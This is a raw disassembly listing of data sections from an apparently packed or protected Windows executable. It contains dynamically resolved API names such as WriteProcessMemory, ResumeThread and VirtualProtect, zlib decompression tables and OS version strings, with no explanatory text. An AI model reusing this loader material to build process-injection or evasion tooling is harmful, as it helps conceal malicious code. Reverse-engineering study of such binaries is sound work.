aLoadimagea_0 db 'LoadImageA',0 ; DATA XREF: _5:0042438C�o
align 4
aMapviewoffil_0 db 'MapViewOfFile',0 ; DATA XREF: _5:00424284�o
align 4
aUnmapviewoff_0 db 'UnmapViewOfFile',0 ; DATA XREF: _5:0042428C�o
aGetfileattri_1 db 'GetFileAttributesA',0 ; DATA XREF: _5:0042423C�o
align 4
aGetfileattri_2 db 'GetFileAttributesW',0 ; DATA XREF: _5:00424244�o
align 4
aGetmodulehan_0 db 'GetModuleHandleA',0 ; DATA XREF: _5:0042431C�o
align 10h
aGetmodulehan_1 db 'GetModuleHandleW',0 ; DATA XREF: _5:00424324�o
align 4
aGetmodulefil_0 db 'GetModuleFileNameA',0 ; DATA XREF: _5:00424374�o
align 4
aSearchpathw db 'SearchPathW',0 ; DATA XREF: sub_41D85C+B2�o
; _5:0042432C�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_41D7FD+D�o
; _5:00424334�o
aAddfontresou_0 db 'AddFontResourceA',0 ; DATA XREF: sub_41E519+A�o
; _5:0042437C�o
align 4
aRemovefontre_0 db 'RemoveFontResourceA',0 ; DATA XREF: sub_41E552+A�o
; _5:00424384�o
aFindfirstfil_0 db 'FindFirstFileA',0 ; DATA XREF: _5:004242C4�o
align 4
aFindfirstfilew db 'FindFirstFileW',0 ; DATA XREF: sub_41D997+92�o
; _5:004242CC�o
align 4
aFindclose_0 db 'FindClose',0 ; DATA XREF: _5:004242DC�o
align 4
aFindnextfile_0 db 'FindNextFileA',0 ; DATA XREF: _5:004242E4�o
align 4
aFindnextfilew db 'FindNextFileW',0 ; DATA XREF: sub_41DC8D+2E�o
; _5:004242EC�o
align 4
aFindfirstfilee db 'FindFirstFileExW',0 ; DATA XREF: sub_41DAE0+92�o
; _5:004242D4�o
align 4
a_lopen db '_lopen',0 ; DATA XREF: sub_41E911+25�o
; _5:004242FC�o
align 10h
aOpenfile db 'OpenFile',0 ; DATA XREF: sub_41E85D+93�o
; _5:004242F4�o
align 4
a_lread db '_lread',0 ; DATA XREF: sub_41E9EC+27�o
; _5:0042430C�o
align 4
a_llseek db '_llseek',0 ; DATA XREF: sub_41E9A7+20�o
; _5:00424314�o
a_lclose db '_lclose',0 ; DATA XREF: sub_41E952+23�o
; _5:00424304�o
aCocreateinstan db 'CoCreateInstance',0 ; DATA XREF: sub_41CBF6+C7�o
; _5:00424394�o
align 4
aCocreateinst_0 db 'CoCreateInstanceEx',0 ; DATA XREF: sub_41CE67+73�o
; _5:0042439C�o
align 4
aCogetclassobje db 'CoGetClassObject',0 ; DATA XREF: sub_41CF9E+AC�o
; _5:004243A4�o
align 10h
aGetprivatepr_2 db 'GetPrivateProfileStringA',0 ; DATA XREF: _5:0042433C�o
align 4
aGetprivatepr_3 db 'GetPrivateProfileIntA',0 ; DATA XREF: _5:00424344�o
align 4
aGetprivatepr_4 db 'GetPrivateProfileSectionNamesA',0 ; DATA XREF: _5:0042434C�o
align 4
aGetprivatepr_5 db 'GetPrivateProfileSectionA',0 ; DATA XREF: _5:00424354�o
align 10h
aGetfileinfor_0 db 'GetFileInformationByHandle',0 ; DATA XREF: _5:0042435C�o
align 4
aLockfile_0 db 'LockFile',0 ; DATA XREF: _5:00424364�o
align 4
aLockfileex db 'LockFileEx',0
align 4
aUnlockfile_0 db 'UnlockFile',0 ; DATA XREF: _5:0042436C�o
align 10h
aUnlockfileex db 'UnlockFileEx',0
align 10h
aGetrecordinf_0 db 'GetRecordInfoFromGuids',0 ; DATA XREF: sub_41D112+D2�o
; _5:004243AC�o
align 4
aGetrecordinfof db 'GetRecordInfoFromTypeInfo',0 ; DATA XREF: sub_41D0A3+35�o
align 4
aLoadregtypelib db 'LoadRegTypeLib',0 ; DATA XREF: sub_41D21A+84�o
; _5:004243B4�o
align 4
aLoadtypelib db 'LoadTypeLib',0 ; DATA XREF: sub_41D112+74�o
; sub_41D21A+4F�o
dword_4219A0 dd 0FFFFFFFFh, 41D74Bh, 41D74Fh, 0FFFFFFFFh, 41D75Fh, 41D763h
; DATA XREF: sub_41D6FE+5�o
dd 0FFFFFFFFh, 41D780h, 41D784h, 0FFFFFFFFh, 41D794h, 41D798h
dd 0FFFFFFFFh, 41D7B9h, 41D7BDh, 0FFFFFFFFh, 41D7CDh, 41D7D1h
dword_4219E8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D85C+5�o
dd offset loc_41D947
align 8
dword_4219F8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D997+5�o
dd offset sub_41DAB6
align 8
dword_421A08 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41DAE0+5�o
dd offset sub_41DC0B
align 8
dword_421A18 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41DE13+5�o
dd offset sub_41DEBC
align 8
dword_421A28 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41E184+5�o
dd offset loc_41E20C
align 8
dword_421A38 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41E28E+5�o
dd offset sub_41E31A
align 8
dword_421A48 dd 0FFFFFFFFh, 41E3AFh, 41E3B3h, 0FFFFFFFFh, 0 ; DATA XREF: sub_41E33E+5�o
dd offset sub_41E42A
dword_421A60 dd 0FFFFFFFFh, 41E49Fh, 41E4A3h, 0 ; DATA XREF: sub_41E45A+5�o
dword_421A70 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41E5D9+5�o
dd offset sub_41E68C
dword_421A7C dd 0 ; DATA XREF: sub_410A10+57�o
; sub_410D4F+52�o
dword_421A80 dd 2 dup(0) ; DATA XREF: sub_410A10+36�o
; sub_410D4F+39�o
dword_421A88 dd 0FFFFFFFFh, 410B20h, 410B24h, 0FFFFFFFFh, 410BD4h, 410BD8h
; DATA XREF: sub_410A10+5�o
dword_421AA0 dd 0FFFFFFFFh, 410E48h, 410E4Ch, 21AE8h, 2 dup(0) ; DATA XREF: sub_410D4F+5�o
dd 21C1Ch, 21000h, 21B34h, 2 dup(0)
dd 21C3Ch, 2104Ch, 5 dup(0)
dd 21B3Ch, 21B58h, 21B6Ah, 21B76h, 21B88h, 21B96h, 21BAAh
dd 21BC2h, 21BDAh, 21BEAh, 21C00h, 21CA0h, 21C90h, 21C48h
dd 21C54h, 21C6Ah, 21C80h, 21CB2h, 0
dd 21C2Ah, 0
db 0AAh ; ª
db 1, 49h, 6Eh
aItializecritic db 'itializeCriticalSection',0
dd 6547013Eh, 6F725074h, 64644163h, 73736572h, 1CC0000h
dd 61636F4Ch, 6572466Ch, 20B0065h, 73696152h, 63784565h
dd 69747065h, 6E6Fh, 6F4C01C8h, 416C6163h, 636F6C6Ch, 1260000h
dd 4D746547h, 6C75646Fh, 6E614865h, 41656C64h, 1C10000h
aLeavecritica_0 db 'LeaveCriticalSection',0
align 2
aF_0 db 'f',0
aEntercritica_0 db 'EnterCriticalSection',0
align 2
dw 22Ch
aResumethread db 'ResumeThread',0
align 2
dw 2E9h
aWriteprocessme db 'WriteProcessMemory',0
align 10h
db 36h ; 6
db 1, 47h, 65h
aTprivateprofil db 'tPrivateProfileSectionA',0
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
aD db '„',0
aDefwindowpro_0 db 'DefWindowProcA',0
align 4
aUser32_dll_0 db 'USER32.dll',0
align 4
db 2Fh ; /
db 2, 52h, 74h
aLunwind db 'lUnwind',0
db 0D2h ; Ò
db 2, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 1E4h
aMultibytetow_0 db 'MultiByteToWideChar',0
dd 434C01BFh, 5370614Dh, 6E697274h, 4167h, 434C01C0h, 5370614Dh
dd 6E697274h, 5767h, 65470153h, 72745374h, 54676E69h, 41657079h
dd 1560000h, 53746547h, 6E697274h, 70795467h, 5765h
_4 ends
; Section 6. (virtual address 00022000)
; Virtual size : 00007070 ( 28784.)
; Section size in file : 00007070 ( 28784.)
; Offset to raw data for section: 00022000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_5 segment para public 'CODE' use32
assume cs:_5
;org 422000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
aInvalidBitLeng db 'invalid bit length repeat',0 ; DATA XREF: sub_41EF26+81D�o
align 4
aTooManyLengthO db 'too many length or distance symbols',0 ; DATA XREF: sub_41EF26+783�o
aInvalidStoredB db 'invalid stored block lengths',0 ; DATA XREF: sub_41EF26+6CC�o
align 10h
aInvalidBlockTy db 'invalid block type',0 ; DATA XREF: sub_41EF26+66B�o
align 4
aInvalidDistanc db 'invalid distance code',0 ; DATA XREF: sub_41F8F5+4BB�o
; sub_41FEC6+23E�o
align 4
aInvalidLiteral db 'invalid literal/length code',0 ; DATA XREF: sub_41F8F5+486�o
; sub_41FEC6+28D�o
byte_4220A8 db 31h ; DATA XREF: sub_42021C+15�r
; sub_420CCE+2F�o
db 2Eh, 31h, 2Eh
dd 34h
aNeedDictionary db 'need dictionary',0 ; DATA XREF: sub_42031E+307�o
aIncorrectDataC db 'incorrect data check',0 ; DATA XREF: sub_42031E+230�o
align 4
aIncorrectHeade db 'incorrect header check',0 ; DATA XREF: sub_42031E+EC�o
align 10h
aInvalidWindowS db 'invalid window size',0 ; DATA XREF: sub_42031E+9C�o
aUnknownCompres db 'unknown compression method',0 ; DATA XREF: sub_42031E+79�o
align 10h
dword_422120 dd 9 ; DATA XREF: sub_420B8A+6�r
dword_422124 dd 5 ; DATA XREF: sub_420B8A+11�r
dword_422128 dd 760h, 100h, 800h, 50h, 800h, 10h, 854h, 73h, 752h, 1Fh
; DATA XREF: sub_420B8A+1C�o
dd 800h, 70h, 800h, 30h, 900h, 0C0h, 750h, 0Ah, 800h, 60h
dd 800h, 20h, 900h, 0A0h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E0h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 90h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D0h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B0h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F0h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C8h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A8h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E8h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 98h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D8h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B8h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F8h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C4h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A4h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E4h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 94h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D4h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B4h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F4h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CCh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ACh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0ECh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Ch, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DCh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BCh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FCh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C2h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A2h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E2h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 92h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D2h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B2h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F2h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CAh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0AAh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EAh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Ah, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DAh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BAh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FAh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C6h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A6h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E6h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 96h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D6h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B6h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F6h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CEh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AEh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EEh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Eh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DEh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BEh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FEh, 760h, 100h, 800h
dd 50h, 800h, 10h, 854h, 73h, 752h, 1Fh, 800h, 70h, 800h
dd 30h, 900h, 0C1h, 750h, 0Ah, 800h, 60h, 800h, 20h, 900h
dd 0A1h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E1h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 91h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D1h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B1h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F1h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C9h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A9h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E9h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 99h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D9h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B9h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F9h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C5h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A5h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E5h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 95h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D5h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B5h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F5h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CDh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ADh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0EDh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Dh, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DDh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BDh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FDh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C3h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A3h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E3h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 93h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D3h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B3h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F3h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CBh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0ABh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EBh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Bh, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DBh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BBh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FBh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C7h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A7h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E7h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 97h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D7h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B7h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F7h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CFh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AFh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EFh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Fh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DFh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BFh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FFh
dword_423128 dd 550h, 1, 557h, 101h, 553h, 11h, 55Bh, 1001h, 551h, 5
; DATA XREF: sub_420B8A+25�o
dd 559h, 401h, 555h, 41h, 55Dh, 4001h, 550h, 3, 558h, 201h
dd 554h, 21h, 55Ch, 2001h, 552h, 9, 55Ah, 801h, 556h, 81h
dd 5C0h, 6001h, 550h, 2, 557h, 181h, 553h, 19h, 55Bh, 1801h
dd 551h, 7, 559h, 601h, 555h, 61h, 55Dh, 6001h, 550h, 4
dd 558h, 301h, 554h, 31h, 55Ch, 3001h, 552h, 0Dh, 55Ah
dd 0C01h, 556h, 0C1h, 5C0h, 6001h
aIncompleteDyna db 'incomplete dynamic bit lengths tree',0 ; DATA XREF: sub_420681+66�o
aOversubscribed db 'oversubscribed dynamic bit lengths tree',0 ; DATA XREF: sub_420681+4E�o
aIncompleteLite db 'incomplete literal/length tree',0 ; DATA XREF: sub_420A87:loc_420B6C�o
align 4
aOversubscrib_1 db 'oversubscribed literal/length tree',0 ; DATA XREF: sub_420A87+D7�o
align 4
aEmptyDistanceT db 'empty distance tree with lengths',0 ; DATA XREF: sub_420A87:loc_420B50�o
align 4
aIncompleteDist db 'incomplete distance tree',0 ; DATA XREF: sub_420A87+BB�o
align 4
aOversubscrib_0 db 'oversubscribed distance tree',0 ; DATA XREF: sub_420A87+AD�o
align 4
dword_423318 dd 0 ; DATA XREF: sub_41EF26:loc_41F35A�r
; sub_41EF26+4C0�r ...
dd 1, 3, 7, 0Fh, 1Fh, 3Fh, 7Fh, 0FFh, 1FFh, 3FFh, 7FFh
dd 0FFFh, 1FFFh, 3FFFh, 7FFFh, 0FFFFh
aGetcurrentproc db 'GetCurrentProcess',0 ; DATA XREF: sub_411310+1E4�o
; sub_412300+16B�o
align 10h
aFlushinstructi db 'FlushInstructionCache',0 ; DATA XREF: sub_411310:loc_4114E0�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_411310+1AB�o
; sub_411DF0+1D�o ...
align 4
aBarier db 'BARIER',0 ; DATA XREF: sub_411310+4C�o
align 10h
aWindowsntUnkno db 'WindowsNT(unknown)',0 ; DATA XREF: _3:loc_4121F5�o
; _3:loc_412201�o
align 4
aWindows_net db 'Windows.NET',0 ; DATA XREF: _3:004121E9�o
aWindowsxp db 'WindowsXP',0 ; DATA XREF: _3:004121D1�o
align 4
aWindows2000 db 'Windows2000',0 ; DATA XREF: _3:004121B9�o
aWindowsnt4_0 db 'WindowsNT(4.0)',0 ; DATA XREF: _3:00412195�o
align 4
aWindowsnt3_51 db 'WindowsNT(3.51)',0 ; DATA XREF: _3:0041217A�o
aWindows9xUnkno db 'Windows9x(unknown)',0 ; DATA XREF: _3:loc_41215F�o
align 4
aWindowsme db 'WindowsMe',0 ; DATA XREF: _3:00412153�o
align 4
aWindows98 db 'Windows98',0 ; DATA XREF: _3:0041213B�o
align 4
aWindows95 db 'Windows95',0 ; DATA XREF: _3:00412123�o
align 10h
aWin32s db 'win32s',0 ; DATA XREF: _3:loc_412108�o
align 4
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: _3:loc_411EB9�o
; sub_412300+52B�o
align 4
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_412300+86D�o
align 4
aPostmessagea db 'PostMessageA',0 ; DATA XREF: sub_412300+859�o
align 4
aDefwindowproca db 'DefWindowProcA',0 ; DATA XREF: sub_412300+845�o
align 4
aEnumwindows db 'EnumWindows',0 ; DATA XREF: sub_412300+831�o
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_412300+81D�o
align 4
aDispatchmessag db 'DispatchMessageA',0 ; DATA XREF: sub_412300+809�o
align 4
aTranslatemessa db 'TranslateMessage',0 ; DATA XREF: sub_412300+7F5�o
align 4
aGetmessagea db 'GetMessageA',0 ; DATA XREF: sub_412300+7E1�o
aCreatewindowex db 'CreateWindowExA',0 ; DATA XREF: sub_412300+7CD�o
aGetsystemmetri db 'GetSystemMetrics',0 ; DATA XREF: sub_412300+7B9�o
align 4
aRegisterclasse db 'RegisterClassExA',0 ; DATA XREF: sub_412300+7A5�o
align 10h
aSetforegroundw db 'SetForegroundWindow',0 ; DATA XREF: sub_412300+791�o
aSetactivewindo db 'SetActiveWindow',0 ; DATA XREF: sub_412300+77D�o
aGetwindowthrea db 'GetWindowThreadProcessId',0 ; DATA XREF: sub_412300+769�o
align 10h
aBitblt db 'BitBlt',0 ; DATA XREF: sub_412300+755�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_412300+741�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_412300+72D�o
align 4
aGetobjecta db 'GetObjectA',0 ; DATA XREF: sub_412300+719�o
align 4
aEndpaint db 'EndPaint',0 ; DATA XREF: sub_412300+705�o
align 10h
aBeginpaint db 'BeginPaint',0 ; DATA XREF: sub_412300+6F1�o
align 4
aRemovefontreso db 'RemoveFontResourceA',0 ; DATA XREF: sub_412300+6DD�o
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_412300+6C9�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_412300+6B5�o
align 10h
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_412300+6A1�o
align 4
aAddfontresourc db 'AddFontResourceA',0 ; DATA XREF: sub_412300:loc_41298D�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_412300+668�o
align 4
aWvsprintfa db 'wvsprintfA',0 ; DATA XREF: sub_412300+654�o
align 10h
aWsprintfa db 'wsprintfA',0 ; DATA XREF: sub_412300+640�o
align 4
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_412300+62C�o
aLoadimagea db 'LoadImageA',0 ; DATA XREF: sub_412300+618�o
align 4
aCharupperbuffa db 'CharUpperBuffA',0 ; DATA XREF: sub_412300+604�o
align 4
aChangedisplays db 'ChangeDisplaySettingsA',0 ; DATA XREF: sub_412300:loc_4128F0�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_412300+5CB�o
align 4
aLstrcmpia db 'lstrcmpiA',0 ; DATA XREF: sub_412300+5B7�o
align 4
aWritefile db 'WriteFile',0 ; DATA XREF: sub_412300+5A3�o
; sub_41D579+153�o
align 10h
aWidechartomult db 'WideCharToMultiByte',0 ; DATA XREF: sub_412300+58F�o
aWaitforsingleo db 'WaitForSingleObject',0 ; DATA XREF: sub_412300+57B�o
; sub_41AB84+1D4�o
aVirtualquery db 'VirtualQuery',0 ; DATA XREF: sub_412300+567�o
align 4
aVirtualprotect db 'VirtualProtect',0 ; DATA XREF: sub_412300+553�o
align 4
aVirtualfree db 'VirtualFree',0 ; DATA XREF: sub_412300+53F�o
aUnmapviewoffil db 'UnmapViewOfFile',0 ; DATA XREF: sub_412300+517�o
aUnlockfile db 'UnlockFile',0 ; DATA XREF: sub_412300+503�o
align 10h
aTerminateproce db 'TerminateProcess',0 ; DATA XREF: sub_412300+4EF�o
align 4
aSleep db 'Sleep',0 ; DATA XREF: sub_412300+4DB�o
; sub_41AB84+25E�o
align 4
aSetunhandledex db 'SetUnhandledExceptionFilter',0 ; DATA XREF: sub_412300+4C7�o
aSetlasterror db 'SetLastError',0 ; DATA XREF: sub_412300+4B3�o
align 4
aSetfilepointer db 'SetFilePointer',0 ; DATA XREF: sub_412300+49F�o
align 4
aSetevent db 'SetEvent',0 ; DATA XREF: sub_412300+48B�o
align 4
aSetenvironment db 'SetEnvironmentVariableA',0 ; DATA XREF: sub_412300+477�o
aReadfile db 'ReadFile',0 ; DATA XREF: sub_412300+463�o
align 4
aRaiseexception db 'RaiseException',0 ; DATA XREF: sub_412300+44F�o
align 4
aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_412300+43B�o
; sub_41AB84+230�o
aMultibytetowid db 'MultiByteToWideChar',0 ; DATA XREF: sub_412300+427�o
aMapviewoffile db 'MapViewOfFile',0 ; DATA XREF: sub_412300+413�o
align 4
aLockfile db 'LockFile',0 ; DATA XREF: sub_412300+3FF�o
align 4
aLocalfree db 'LocalFree',0 ; DATA XREF: sub_412300+3EB�o
align 10h
aLocalalloc db 'LocalAlloc',0 ; DATA XREF: sub_412300+3D7�o
align 4
aLoadlibraryexa db 'LoadLibraryExA',0 ; DATA XREF: sub_412300+3C3�o
align 4
aLoadlibrarya db 'LoadLibraryA',0 ; DATA XREF: sub_412300+3AF�o
align 4
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_412300+39B�o
align 4
aDeletecritical db 'DeleteCriticalSection',0 ; DATA XREF: sub_412300+387�o
align 4
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: sub_412300+373�o
align 4
aHeapcreate db 'HeapCreate',0 ; DATA XREF: sub_412300+35F�o
align 4
aHeapfree db 'HeapFree',0 ; DATA XREF: sub_412300+34B�o
align 10h
aHeapalloc db 'HeapAlloc',0 ; DATA XREF: sub_412300+337�o
align 4
aGettickcount db 'GetTickCount',0 ; DATA XREF: sub_412300+323�o
align 4
aGetversionexa db 'GetVersionExA',0 ; DATA XREF: sub_412300+30F�o
align 4
aGettemppatha db 'GetTempPathA',0 ; DATA XREF: sub_412300+2FB�o
; sub_41AB84+92�o
align 4
aGettempfilenam db 'GetTempFileNameA',0 ; DATA XREF: sub_412300+2E7�o
align 10h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0 ; DATA XREF: sub_412300+2D3�o
aGetprocaddress db 'GetProcAddress',0 ; DATA XREF: sub_412300+2BF�o
align 4
aGetprivatepr_1 db 'GetPrivateProfileStringA',0 ; DATA XREF: sub_412300+2AB�o
align 4
aGetprivatepr_0 db 'GetPrivateProfileSectionNamesA',0 ; DATA XREF: sub_412300+297�o
align 4
aGetprivateprof db 'GetPrivateProfileIntA',0 ; DATA XREF: sub_412300+283�o
align 4
aGetmodulehandl db 'GetModuleHandleA',0 ; DATA XREF: sub_412300+26F�o
align 10h
aGetmodulefilen db 'GetModuleFileNameA',0 ; DATA XREF: sub_412300+25B�o
align 4
aGetlasterror db 'GetLastError',0 ; DATA XREF: sub_412300+247�o
align 4
aGetfullpathn_0 db 'GetFullPathNameW',0 ; DATA XREF: sub_412300+233�o
align 4
aGetfullpathnam db 'GetFullPathNameA',0 ; DATA XREF: sub_412300+21F�o
align 4
aGetfiletime db 'GetFileTime',0 ; DATA XREF: sub_412300+20B�o
aGetfilesize db 'GetFileSize',0 ; DATA XREF: sub_412300+1F7�o
aGetfileinforma db 'GetFileInformationByHandle',0 ; DATA XREF: sub_412300+1E3�o
align 10h
aGetfileattri_0 db 'GetFileAttributesW',0 ; DATA XREF: sub_412300+1CF�o
align 4
aGetfileattribu db 'GetFileAttributesA',0 ; DATA XREF: sub_412300+1BB�o
align 4
